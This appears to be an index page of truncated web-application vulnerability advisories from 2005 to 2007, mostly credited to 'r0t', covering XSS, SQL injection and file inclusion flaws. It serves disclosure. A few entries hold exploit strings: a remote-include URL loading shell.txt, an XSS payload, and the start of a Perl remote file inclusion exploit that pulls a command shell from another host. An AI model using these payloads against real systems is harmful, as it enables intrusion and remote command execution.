Wikepage XSS vuln
Sunday, 7 October 2007 Wikepage XSS vuln. Vuln. discovered by : r0t Date: 7 October 2007 Vendor: http://www.wikepage.org/ affected versions: Wikepage Opus 13 2007.2 other versions also can be affected. Wikepage contains a flaw that allows remote Cross-Site Scripting attacks. Input passed to the...
phpMyAdmin multiple XSS vuln.
phpMyAdmin multiple XSS vuln. Vuln. discovered by : r0t Date: 10 August 2007 vendor: http://www.phpmyadmin.net/ original advisory: http://pridels-team.blogspot.com/2007/08/phpmyadmin-multiple-xss-vuln.html affected versions: 2.10.3 latest stable version prior versions also can be affected. phpMyAdmi...
VisionProject Multiple XSS vuln.
VisionProject Multiple XSS vuln. Vuln. discovered by : r0t Date: 7 August 2007 vendor: www.visionproject.se original advisory: http://pridels-team.blogspot.com/2007/08/visionproject-multiple-xss-vuln.html affected versions: VisionProject 3.1 and previous VisionProject contains a flaw that allows a...
DirectAdmin XSS vuln.
DirectAdmin XSS vuln. Vuln. discovered by : r0t Date: 28 June 2007 vendor: http://www.directadmin.com original advisory: http://pridels-team.blogspot.com/2007/06/directadmin-xss-vuln.html affected versions: v1.30.1 and previous DirectAdmin contains a flaw that allows a remote Cross-Site Scripting...
phpRaider sql vuln.
phpRaider sql vuln. Vuln. discovered by : r0t Date: 22 June 2007 vendor: http://phpraider.com/ original advisory: http://pridels-team.blogspot.com/2007/06/phpraider-sql-vuln.html affected versions: phpRaider v1.0.0.rc8 other versions also can be affected. phpRaider contains a flaw that allows a...
PHPAccounts vuln.
PHPAccounts vuln. Vuln. discovered by : r0t Date: 21 June 2007 vendor: http://phpaccounts.com/ original advisory: http://pridels-team.blogspot.com/2007/06/phpaccounts-vuln.html affected versions: PHPAccounts 0.5 other versions also can be affected. 1. Local file inclusion PHPAccounts contains a fla...
FileRun Vuln.
FileRun Vuln. Vuln. discovered by : r0t Date: 2 May 2007 vendor: http://filerun.dreamhosters.com/ original advisory: http://pridels.blogspot.com/2007/05/filerun-vuln.html affected versions: 1.0 and previous 1. FileRun contains a flaw that allows remote SQL injection attacks. Input passed to the "fi...
drjr7.txt
TitLe : Remote Include Vulnerability ==== in Dr.Jr7 Gallery 3.2 RC1 eXpLoIt : http://target/path/Galleryone/Gallery.php?pic=shell.txt By : R0t-KeY --- s33 u ;...
Xss in MttKe-php v2.6
TitLe : Xss in MttKe-php v2.6 eXpLoIt : http://target/path/components/polls?p=poll&topic=scriptalert/script By : R0t-KeY --- s33 u ;...
[SA20993] HiveMail Cross-Site Scripting and SQL Injection Vulnerabilities
DGNews v 1.5 File Upload Vuln.
DGNews v 1.5 File Upload Vuln. Vuln. discovered by : r0t Date: 29 May 2006 vendor: www.diangemilang.com/dgscripts.php affected versions: v 1.5 and prior original advisory: http://pridels.blogspot.com/2006/05/dgnews-v-15-file-upload-vuln.html Vuln. Description: It is possible to upload arbitrary file...
[SA19952] Albinator File Inclusion and Cross-Site Scripting Vulnerabilities
TITLE: Albinator File Inclusion and Cross-Site Scripting Vulnerabilities SECUNIA ADVISORY ID: SA19952 VERIFY ADVISORY: http://secunia.com/advisories/19952/ CRITICAL: Highly critical IMPACT: Cross Site Scripting, System access WHERE: From remote REVISION: 1.1 originally posted 2006-05-04 SOFTWARE:...
Albinator <= 2.0.6 (Config_rootdir) Remote File Inclusion Exploit
Exploit for unknown platform in category web applications ================================================================= Albinator perl wb.pl http://vulnerable.com/ http://target.com/cmd.gif cmd cmd shell example: cmd shell variable: $GETcmd; use LWP::UserAgent; $Path = $ARGV0; $Pathtocmd =...
albinator <= 2.0.8 Remote File Inclusion Vuln and XSS
albinator <= 2.0.8 Remote File Inclusion Vuln and XSS Vuln. discovered by : VietMafia & r0t Pridels Sec Crew Date: 3 May 2006 vendor: http://www.albinator.com/ affected versions: 2.8 and prior original advisory: http://pridels.blogspot.com/2006/05/albinator-208-remote-file-inclusion.html Vuln...
X-Cart SQL inj. vuln.
X-Cart SQL inj. vuln. Vuln. discovered by : r0t Date: 20 April 2006 vendorlink: http://www.x-cart.com/ affected versions: X-Cart Gold v4.0.18 X-Cart Pro v4.0.18 X-Cart 4.1.0 beta 1 and prior versions also can be affected. original advisory:...
IPB <= 2.1.5 SQL inj. vuln.
IPB <= 2.1.5 SQL inj. vuln. Vuln. discovered by : r0t Date: 19 April 2006 vendorlink: http://www.invisionboard.com/ affected versions: 2.1.5 and previous original advisory: http://pridels.blogspot.com/2006/04/ipb-215-sql-inj-vuln.html Vuln. Description: IPB contains a flaw that allows a remote sql...
xFlow v5.x multiple vuln.
xFlow v5.x multiple vuln. Vuln. discovered by : r0t Date: 18 April 2006 vendorlink: http://www.skymarx.com/affiliatesoftware.html affected versions: v5.46.11 and previous original advisory: http://pridels.blogspot.com/2006/04/xflow-v5x-multiple-vuln.html Product info: After over five years of...
classifiedZONE v1.2 XSS vuln.
classifiedZONE v1.2 XSS vuln. Vuln. discovered by : r0t Date: 28 march 2006 vendor:http://www.fusionzone.com/applications/classifieds/ affected versions:v.1.2 and prior Vuln. Description: classifiedZONE contains a flaw that allows a remote cross site scripting attack. This flaw exists because inp...
Primo Cart SQL inj.
Primo Cart SQL inj. Vuln. discovered by : r0t Date: 2 Jan. 2006 original advisory: http://pridels.blogspot.com/2006/01/primo-cart-sql-inj.html vendor: www.primoplace.com/primo-cart.htm affected version: 1.0 and prior Product Description: Primo Cart is a fully customizable turnkey shopping cart soluti...
OoApp Guestbook XSS vuln.
OoApp Guestbook XSS vuln. Vuln. discovered by : r0t Date: 30 Dec. 2005 original advisory: http://pridels.blogspot.com/2005/12/ooapp-guestbook-xss-vuln.html vendor: http://www.ooapp.com/ affected version: 2.1 and prior Product Description: This is a free php based guestbook for your web site. Easy to...